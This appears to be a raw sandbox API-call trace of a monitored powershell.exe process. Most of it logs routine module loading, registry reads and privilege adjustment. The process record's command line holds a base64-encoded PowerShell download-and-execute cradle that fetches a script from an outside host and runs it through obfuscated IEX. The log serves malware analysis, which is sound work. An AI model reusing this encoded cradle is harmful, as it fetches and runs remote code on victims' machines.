	[0966.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.460] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e8
	[0966.462] CoCreateGuid (in: pguid=0x22deb0 | out: pguid=0x22deb0*(Data1=0x5128a67, Data2=0xcc37, Data3=0x4bfe, Data4=([0]=0x89, [1]=0x2d, [2]=0xa4, [3]=0xb9, [4]=0xe8, [5]=0x74, [6]=0x67, [7]=0xf0))) returned 0x0
	[0966.463] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0966.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.463] CoTaskMemFree (pv=0x4dfff0) 
	[0967.112] WinSqmIsOptedIn () returned 0x0
	[0967.114] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0967.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.114] CoTaskMemFree (pv=0x4dfff0) 
	[0967.115] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0967.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.115] CoTaskMemFree (pv=0x4dfff0) 
	[0967.116] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0967.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.116] CoTaskMemFree (pv=0x4dfff0) 
	[0967.116] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0967.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.116] CoTaskMemFree (pv=0x4dfff0) 
	[0967.117] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0967.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.117] CoTaskMemFree (pv=0x4dfff0) 
	[0969.015] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0969.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.015] CoTaskMemFree (pv=0x4dfff0) 
	[0969.016] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0969.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.016] CoTaskMemFree (pv=0x4dfff0) 
	[0969.016] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0969.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.016] CoTaskMemFree (pv=0x4dfff0) 
	[0969.018] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0969.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.018] CoTaskMemFree (pv=0x4dfff0) 
	[0970.383] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0970.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.383] CoTaskMemFree (pv=0x4dfff0) 
	[0970.384] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0970.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.384] CoTaskMemFree (pv=0x4dfff0) 
	[0970.384] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0970.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.384] CoTaskMemFree (pv=0x4dfff0) 
	[0981.755] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0981.755] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0981.755] CoTaskMemFree (pv=0x4dfff0) 
	[0983.042] CoTaskMemAlloc (cb=0xcc) returned 0x1b959890
	[0983.042] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b959890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.043] CoTaskMemFree (pv=0x1b959890) 
	[0983.043] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22da28 | out: phkResult=0x22da28*=0x2ec) returned 0x0
	[0983.043] RegQueryValueExW (in: hKey=0x2ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d9ac, lpData=0x0, lpcbData=0x22d9a8*=0x0 | out: lpType=0x22d9ac*=0x2, lpData=0x0, lpcbData=0x22d9a8*=0x6c) returned 0x0
	[0983.043] CoTaskMemAlloc (cb=0x70) returned 0x486fa0
	[0983.043] RegQueryValueExW (in: hKey=0x2ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d97c, lpData=0x486fa0, lpcbData=0x22d978*=0x6c | out: lpType=0x22d97c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x22d978*=0x6c) returned 0x0
	[0983.043] CoTaskMemFree (pv=0x486fa0) 
	[0983.043] CoTaskMemAlloc (cb=0xcc) returned 0x1b959890
	[0983.043] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b959890, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0983.043] CoTaskMemFree (pv=0x1b959890) 
	[0983.043] CoTaskMemAlloc (cb=0xcc) returned 0x1b959890
	[0983.043] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b959890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.043] CoTaskMemFree (pv=0x1b959890) 
	[0983.045] RegCloseKey (hKey=0x2ec) returned 0x0
	[0983.045] CoTaskMemAlloc (cb=0xcc) returned 0x1b959890
	[0983.045] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b959890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.047] CoTaskMemFree (pv=0x1b959890) 
	[0983.047] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22da28 | out: phkResult=0x22da28*=0x2ec) returned 0x0
	[0983.047] RegQueryValueExW (in: hKey=0x2ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d9ac, lpData=0x0, lpcbData=0x22d9a8*=0x0 | out: lpType=0x22d9ac*=0x0, lpData=0x0, lpcbData=0x22d9a8*=0x0) returned 0x2
	[0983.048] RegCloseKey (hKey=0x2ec) returned 0x0

Thread:
	id = 647
	os_tid = 0x144c


Thread:
	id = 654
	os_tid = 0x146c


Thread:
	id = 1330
	os_tid = 0x1e18


Thread:
	id = 1332
	os_tid = 0x1e20


Thread:
	id = 1339
	os_tid = 0x1e50


Thread:
	id = 1432
	os_tid = 0x1128


Thread:
	id = 1575
	os_tid = 0x2114


Thread:
	id = 1593
	os_tid = 0x2160

	[0824.713] CoGetContextToken (in: pToken=0x292f510 | out: pToken=0x292f510) returned 0x0
	[0824.713] CObjectContext::QueryInterface () returned 0x0
	[0824.714] CObjectContext::GetCurrentThreadType () returned 0x0
	[0824.714] Release () returned 0x0
	[0824.714] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2100
	os_tid = 0x498


Process:
	id = "109"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x652fa000"
	os_pid = "0xc34"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 572
	os_tid = 0xcd0

	[0824.781] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0833.347] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0833.347] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0833.347] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0833.348] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0907.359] sprintf_s (in: _DstBuf=0x24f398, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0909.124] GetVersionExW (in: lpVersionInformation=0x24dea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0909.126] GetVersionExW (in: lpVersionInformation=0x24dea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0909.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0909.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0909.136] GetVersionExW (in: lpVersionInformation=0x24dc10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dc10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0909.137] SetErrorMode (uMode=0x1) returned 0x1
	[0909.137] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24dd70 | out: lpFileInformation=0x24dd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0909.138] SetErrorMode (uMode=0x1) returned 0x1
	[0910.015] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dfe0 | out: lpdwHandle=0x24dfe0) returned 0x94c
	[0910.018] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e572f0 | out: lpData=0x2e572f0) returned 1
	[0910.021] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24df58, puLen=0x24df50 | out: lplpBuffer=0x24df58*=0x2e5738c, puLen=0x24df50) returned 1
	[0910.025] lstrlenW (lpString="䅁") returned 1
	[0910.037] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e57468, puLen=0x24dec0) returned 1
	[0910.038] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0910.041] CoTaskMemAlloc (cb=0x2e) returned 0x5017b0
	[0910.041] lstrcpyW (in: lpString1=0x5017b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0910.042] CoTaskMemFree (pv=0x5017b0) 
	[0910.042] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e574bc, puLen=0x24dec0) returned 1
	[0910.042] lstrlenW (lpString="System.Management.Automation") returned 28
	[0910.043] CoTaskMemAlloc (cb=0x3c) returned 0x449cc0
	[0910.043] lstrcpyW (in: lpString1=0x449cc0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0910.043] CoTaskMemFree (pv=0x449cc0) 
	[0910.043] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e57518, puLen=0x24dec0) returned 1
	[0910.043] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0910.043] CoTaskMemAlloc (cb=0x20) returned 0x50a6b0
	[0910.043] lstrcpyW (in: lpString1=0x50a6b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0910.043] CoTaskMemFree (pv=0x50a6b0) 
	[0910.043] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e57558, puLen=0x24dec0) returned 1
	[0910.043] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0910.043] CoTaskMemAlloc (cb=0x44) returned 0x449cc0
	[0910.043] lstrcpyW (in: lpString1=0x449cc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0910.043] CoTaskMemFree (pv=0x449cc0) 
	[0910.043] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e575c0, puLen=0x24dec0) returned 1
	[0910.043] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0910.043] CoTaskMemAlloc (cb=0x76) returned 0x4b1b50
	[0910.043] lstrcpyW (in: lpString1=0x4b1b50, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0910.043] CoTaskMemFree (pv=0x4b1b50) 
	[0910.043] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e5765c, puLen=0x24dec0) returned 1
	[0910.043] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0910.043] CoTaskMemAlloc (cb=0x44) returned 0x449cc0
	[0910.043] lstrcpyW (in: lpString1=0x449cc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0910.043] CoTaskMemFree (pv=0x449cc0) 
	[0910.043] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e576c0, puLen=0x24dec0) returned 1
	[0910.043] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0910.044] CoTaskMemAlloc (cb=0x58) returned 0x465c60
	[0910.044] lstrcpyW (in: lpString1=0x465c60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0910.044] CoTaskMemFree (pv=0x465c60) 
	[0910.044] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e5773c, puLen=0x24dec0) returned 1
	[0910.044] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0910.044] CoTaskMemAlloc (cb=0x20) returned 0x50a6b0
	[0910.044] lstrcpyW (in: lpString1=0x50a6b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0910.044] CoTaskMemFree (pv=0x50a6b0) 
	[0910.044] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2e573e4, puLen=0x24dec0) returned 1
	[0910.045] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0910.045] CoTaskMemAlloc (cb=0x66) returned 0x47b850
	[0910.045] lstrcpyW (in: lpString1=0x47b850, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0910.045] CoTaskMemFree (pv=0x47b850) 
	[0910.045] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x0, puLen=0x24dec0) returned 0
	[0910.045] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x0, puLen=0x24dec0) returned 0
	[0910.045] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x0, puLen=0x24dec0) returned 0
	[0910.045] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24de98, puLen=0x24de90 | out: lplpBuffer=0x24de98*=0x2e5738c, puLen=0x24de90) returned 1
	[0910.046] CoTaskMemAlloc (cb=0x204) returned 0x4b3e50
	[0910.046] VerLanguageNameW (in: wLang=0x0, szLang=0x4b3e50, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0911.031] CoTaskMemFree (pv=0x4b3e50) 
	[0911.031] VerQueryValueW (in: pBlock=0x2e572f0, lpSubBlock="\\", lplpBuffer=0x24dee8, puLen=0x24dee0 | out: lplpBuffer=0x24dee8*=0x2e57318, puLen=0x24dee0) returned 1
	[0911.037] GetCurrentProcessId () returned 0xc34
	[0911.052] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24ce10 | out: lpLuid=0x24ce10*(LowPart=0x14, HighPart=0)) returned 1
	[0911.055] GetCurrentProcess () returned 0xffffffffffffffff
	[0911.056] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24ce30 | out: TokenHandle=0x24ce30*=0x2ac) returned 1
	[0911.057] AdjustTokenPrivileges (in: TokenHandle=0x2ac, DisableAllPrivileges=0, NewState=0x2e5ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0911.058] CloseHandle (hObject=0x2ac) returned 1
	[0911.062] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc34) returned 0x2ac
	[0912.009] EnumProcessModules (in: hProcess=0x2ac, lphModule=0x2e5abd0, cb=0x200, lpcbNeeded=0x24de48 | out: lphModule=0x2e5abd0, lpcbNeeded=0x24de48) returned 1
	[0912.013] GetModuleInformation (in: hProcess=0x2ac, hModule=0x13f370000, lpmodinfo=0x2e5ae40, cb=0x18 | out: lpmodinfo=0x2e5ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0912.015] CoTaskMemAlloc (cb=0x804) returned 0x50b2d0
	[0912.015] GetModuleBaseNameW (in: hProcess=0x2ac, hModule=0x13f370000, lpBaseName=0x50b2d0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0912.015] CoTaskMemFree (pv=0x50b2d0) 
	[0912.015] CoTaskMemAlloc (cb=0x804) returned 0x50b2d0
	[0912.016] GetModuleFileNameExW (in: hProcess=0x2ac, hModule=0x13f370000, lpFilename=0x50b2d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0912.016] CoTaskMemFree (pv=0x50b2d0) 
	[0912.018] CloseHandle (hObject=0x2ac) returned 1
	[0912.026] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc34) returned 0x2ac
	[0912.027] GetExitCodeProcess (in: hProcess=0x2ac, lpExitCode=0x24df78 | out: lpExitCode=0x24df78*=0x103) returned 1
	[0912.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e5b088, Length=0x20000, ResultLength=0x24df40 | out: SystemInformation=0x12e5b088, ResultLength=0x24df40*=0x4a550) returned 0xc0000004
	[0912.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e7b0b8, Length=0x4cd50, ResultLength=0x24df40 | out: SystemInformation=0x12e7b0b8, ResultLength=0x24df40*=0x4a550) returned 0x0
	[0912.702] EnumWindows (lpEnumFunc=0x29866ac, lParam=0x0) 
	[0913.133] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.133] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x558
	[0913.133] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.133] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.134] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.134] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x538
